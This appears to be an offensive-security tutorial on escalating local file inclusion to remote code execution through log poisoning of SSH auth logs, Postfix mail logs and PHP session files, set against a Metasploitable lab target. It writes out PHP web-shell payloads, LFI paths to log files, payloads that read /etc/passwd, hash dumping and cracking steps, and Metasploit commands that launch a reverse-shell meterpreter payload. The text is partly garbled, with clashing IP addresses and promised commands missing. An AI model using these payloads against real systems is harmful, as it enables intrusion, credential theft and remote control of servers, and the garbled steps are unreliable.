RCE with log poisoning Attack Methodologies
Some of the important log files are the following :-
http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/error.log http://example.com/index.php?page=/var/log/nginx/access.log http://example.com/index.php?page=/var/log/nginx/error.log http://example.com/index.php?page=/var/log/vsftpd.log http://example.com/index.php?page=/var/log/sshd.log http://example.com/index.php?page=/var/log/auth http://example.com/index.php?page=/var/log/mail http://example.com/index.php?page=/var/log/httpd/error_log http://example.com/index.php?page=/usr/local/apache/log/error_log http://example.com/index.php?page=/usr/local/apache2/log/error_log
It is important to get to know a great method to exploit when a web server essentially suffers from local file inclusion (LFI). Let’s assume we are working on a Metasploitable 2 target and the operating system to run the attack is Kali Linux.
The following steps explain how one can perform this process on Kali Linux:
Open the Kali Linux terminal and connect the target by using SSH service. The following command can be in great use then
Check the permission of auth.log file beforehand using the following command
ls -l /var/log/auth.log
Most of the time the auth.log file appears to have the read-write permission. They should appear like the following
:-rw-r—r—r—syslog adm …...
We can now have access to the file and read all its logs through the following command
: tail -f /var/log/auth.log
We can walk through the logs and check the specific logs of the user named “mfsadmin”.
Now, let’s attempt to connect to the webserver using a counterfeit username. One can use the following command for an invalid login
The permission should now be denied and shown clearly as follows
"Permission denied, please try again."
Then, get back to the auth.log file and ensure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 220.127.116.11
"Failed Password for invalid user hacker from 192.168.1.104 port 56566 ssh2"
This means that a login whether a passed one or an invalid one, it will get recorded and shown inside the logs. Then, let’s now try passing a PHP code as an invalid user and see how the reaction of such deed will be. The following command provides a PHP invalid user login attempt.
ssh ‘<?php system($_GET[‘c’]); ?>’@192.168.1.105
Then, get back again to the auth.log file and make sure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 18.104.22.168
“Failed Password for invalid user <?php system($_GET[‘c’]); ?> from 192.168.1.104 port 49642 ssh2”
Let’s assume that you have previously created LFI and now we try to browse to it using the following link:
An error will appear looking like local file inclusion vulnerability.
The auth.log file should get included as a parameter now through the following URL inside the browser:
Note that a warning will display, with the following text:
“Warning cannot execute a blank command or log entry contains the ssh username with <?php system($_GET[‘c’]); ?> with ssh failed etc.”
Let’s discuss what this actually means. The PHP code which previously contained the CMD comment has already been injected. Any command can then get sent as a parameter now.
Let’s now browse into
this will dump the data of auth.log besides executing a comment given through cmd
Let’s now browse into "192.168.1.105/lfi/lfi.php file=/var/log/auth.log&c=pwd".
This way, the results can display inside the window
Log Poisoning via Mail
As the logs tell us, the server is running Postfix and also has port 25 SMTP open, which was found from a basic Nmap scan. Now our goal is to inject PHP into the logs causing the PHP to render onto your web browser, once you refresh the page with the LFI vulnerability. Sending the phpinfo syntax is a great initial test, but our end goal will be to send this:
<?php echo system($_GET["cmd"]); ?>
So how can we get this PHP string into the postfix mail.log? By default, Postfix includes dates, email addresses, and some other basic data. Fire up emails, mutt or telnet to send the victim server mail. Also, using SMTP-user-enum on Kali may be a wise option to check for valid users – as long as VRFY isn’t disabled while postfix configs.
If you were thorough, you’ll notice the mail log includes the text of the mail subject. This is just perfect – now we can have PHP process any arbitrary code we mail it.
SMTP command flow via telnet may look something like this.
|telnet 192.168.1.107 25|
Now let’s try to send a mail via command line (CLI) of this machine and send the OS commands via the “RCPT TO” option. Since the mail.log file generates a log for every mail when we try to connect with the webserver. Taking advantage of this feature now I will send malicious PHP code as the fake user and it will get added automatically in the mail.log file as a new log.
As our goal is to inject PHP code into the logs and this stage is called logfile poisoning and we can clearly see that details of mail.log, as well as execute comment given through cmd; now execute ifconfig as cmd comment to verify network interface and confirm its result from inside the given screenshot.
In some cases, you can also send the email with the
mail -s "<?php system($_GET['cmd']);?>" [email protected]. < /dev/null
Check if the website uses PHP Session (PHPSESSID)
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/ Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files
Set the cookie to
<?php system('cat /etc/passwd');?>
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
Use the LFI to include the PHP session file
LFI to RCE via phpinfo()
PHPinfo() displays the content of any variables such as $_GET, $_POST and $_FILES.
By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name.
Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
This method requires high privileges inside the application in order to read the sensitive files.
Then extract hashes from these files
samdump2 SYSTEM SAM > hashes.txt, and crack them with
hashcat/john or replay them using the Pass The Hash technique.
Execute following command inside Metasploit:
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set lport 8888
msf exploit (web_delivery)>exploit